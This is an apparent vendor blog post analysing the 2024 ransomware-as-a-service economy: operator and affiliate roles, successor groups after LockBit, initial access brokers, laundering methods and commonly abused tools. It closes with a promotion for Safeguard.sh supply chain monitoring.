By September 2024, the ransomware-as-a-service ecosystem had survived more law enforcement pressure than at any prior point in its history. The FBI disrupted BlackCat/ALPHV in December 2023. Operation Cronos took down LockBit's infrastructure in February 2024. Multiple arrests targeted Scattered Spider operatives. Russian authorities detained alleged REvil members in January 2022.
And yet, ransomware attacks in 2024 were on pace to match or exceed 2023 levels. The RaaS ecosystem had not just survived — it had adapted, decentralized, and in many ways grown stronger. Understanding why requires examining the ecosystem not as a collection of individual groups but as an interconnected economy with its own labor market, supply chain, and competitive dynamics.
The RaaS Business Model
At its core, RaaS is a franchise model. The operators (sometimes called "admins" or "developers") build and maintain the ransomware technology stack:
- The ransomware payload
- Encryption key management infrastructure
- Victim negotiation portals
- Leak sites for stolen data
- Payment processing (cryptocurrency wallets and laundering)
Affiliates operate as independent contractors who:
- Gain initial access to victim networks (through phishing, vulnerability exploitation, or purchased access)
- Conduct post-exploitation activities (lateral movement, privilege escalation, data theft)
- Deploy the ransomware payload
- Sometimes handle victim negotiations
Revenue is split between operators and affiliates, typically 20-30% to operators and 70-80% to affiliates, though competitive pressures pushed affiliate shares higher in 2024.
The 2024 Landscape
Post-LockBit Fragmentation
LockBit's disruption by Operation Cronos created a power vacuum that was filled not by one successor but by many:
RansomHub: Emerged in early 2024 and quickly became one of the most active operations, reportedly absorbing former LockBit and BlackCat affiliates. By mid-2024, RansomHub was listing more victims than any single competitor.
Qilin (Agenda): Expanded operations significantly in 2024, targeting healthcare organizations and critical infrastructure with both Windows and Linux variants.
Hunters International: Positioned itself as a data extortion operation (emphasizing theft over encryption), carrying forward code from the Hive ransomware operation that the FBI disrupted in January 2023.
Medusa: Increased activity through 2024, with a focus on education and healthcare sectors.
INC Ransom: Gained attention for attacks on healthcare organizations and government agencies.
The proliferation of groups meant that affiliates had more choices than ever, and could switch between operations based on reliability, payout terms, and technical capabilities.
The Affiliate Labor Market
By 2024, experienced affiliates operated in a seller's market. Skilled operators with proven track records could negotiate favorable terms from multiple RaaS platforms:
- Higher revenue shares (up to 90% for top performers)
- Priority access to new payload versions and features
- Exclusive targeting territories or sectors
- Support for complex operations including supply chain attacks
This competitive dynamic meant that disrupting a single RaaS brand had limited impact — affiliates simply migrated to alternatives, taking their skills, access, and victim pipelines with them.
Initial Access Brokerage
The initial access broker (IAB) market continued to mature as a distinct layer of the ecosystem:
- IABs specialized in gaining and selling network access, operating independently from ransomware groups
- Access to organizations was sold through underground forums and private channels
- Pricing ranged from hundreds of dollars for small businesses to tens of thousands for large enterprises
- VPN access, RDP access, and web shell access were the most common offerings
This specialization created a supply chain within the criminal ecosystem itself — IABs as suppliers, affiliates as operators, and RaaS platforms as infrastructure providers.
Cryptocurrency Laundering Evolution
Payment processing adapted to increased law enforcement pressure:
- Greater use of privacy-focused cryptocurrencies (Monero) alongside Bitcoin
- Chain-hopping — converting between cryptocurrencies to obscure transaction trails
- Decentralized exchanges and DeFi protocols used for laundering
- Mixers and tumblers despite law enforcement actions against services like Tornado Cash
- Peer-to-peer exchanges to convert cryptocurrency to fiat currency
The Treasury Department's sanctions against cryptocurrency addresses associated with ransomware groups created compliance challenges but didn't significantly reduce payment flows.
Supply Chain Implications
The RaaS ecosystem in 2024 had significant supply chain dimensions:
The Ransomware Supply Chain
The ecosystem itself functioned as a supply chain:
- Vulnerability researchers discovered and sold exploits
- Initial access brokers gained and sold network access
- RaaS operators provided the technology platform
- Affiliates conducted operations and deployed payloads
- Cryptocurrency launderers processed payments
- Bulletproof hosters provided infrastructure
Each layer specialized and traded with adjacent layers, creating resilience — disrupting one layer didn't collapse the chain because the other layers continued operating.
Victim Supply Chain Targeting
Multiple RaaS affiliates converged on supply chain targeting as the highest-ROI strategy:
- MSP compromises for mass victim access
- Software vendor targeting for downstream impact
- File transfer tool exploitation (following Clop's model)
- IT management platform abuse for lateral deployment
The convergence was logical — supply chain attacks maximized the number of victims per intrusion, and the RaaS model's affiliate payouts incentivized efficiency.
Shared Tool Supply Chain
RaaS operators and affiliates relied on a shared set of legitimate and semi-legitimate tools:
- Cobalt Strike: Despite licensing controls, cracked and pirated versions remained widely available
- Mimikatz and similar tools: Open-source credential harvesting tools
- Impacket: Python-based toolkit for network protocols
- RMM tools: Legitimate remote management tools abused for persistence
- Rclone and similar: Data exfiltration through legitimate file transfer tools
This shared toolset created detection opportunities — but also meant that defenders had to distinguish malicious use from legitimate use of the same tools.
The Resilience Problem
The RaaS ecosystem's resilience in 2024 stemmed from several structural factors:
Decentralization: The separation of roles (developers, IABs, affiliates, launderers) meant that no single point of failure could collapse the ecosystem.
Low barriers to entry: New RaaS platforms could launch using leaked source code (Conti, LockBit, Babuk) as a starting point, reducing development costs and time.
Profitable economics: Ransom payments, while potentially declining per-incident, remained profitable enough to sustain the ecosystem. The total ransomware payment volume exceeded $1 billion in 2023.
Safe havens: Key actors continued to operate from jurisdictions with limited law enforcement cooperation, particularly Russia and CIS countries.
Adaptability: When one technique was disrupted or defended, the ecosystem quickly pivoted to alternatives. When Cobalt Strike detection improved, groups adopted Sliver. When email phishing was blocked, groups moved to Teams and phone-based social engineering.
What's Needed
Addressing the RaaS ecosystem requires systemic approaches:
Disruption at scale: Not just targeting individual groups but disrupting the ecosystem's infrastructure layers — IAB marketplaces, cryptocurrency laundering services, bulletproof hosting providers.
Increasing the cost of operations: Regulation of cryptocurrency, improved international law enforcement cooperation, and persistent disruption campaigns that force groups to constantly rebuild infrastructure.
Reducing profitability: Expanding ransomware payment reporting requirements, potentially restricting payments in certain circumstances, and improving backup and recovery capabilities to reduce the need to pay.
Supply chain security: Addressing the software and service provider vulnerabilities that enable mass exploitation and supply chain cascade attacks.
How Safeguard.sh Helps
The RaaS ecosystem's focus on supply chain exploitation — from MSP targeting to file transfer tool abuse — makes software supply chain security a direct counter to the most efficient attack strategies in the ransomware playbook.
Safeguard.sh provides the comprehensive supply chain visibility that defenses against the RaaS ecosystem demand. The platform's automated SBOM management, continuous vulnerability monitoring, and policy enforcement create a systematic approach to securing the software components that ransomware affiliates target.
By mapping your complete dependency chain and monitoring it for vulnerabilities in real time, Safeguard.sh helps you close the supply chain gaps that RaaS affiliates are designed to exploit. When the ransomware ecosystem operates as a specialized supply chain of criminal services, your defense needs to be equally systematic about your own software supply chain.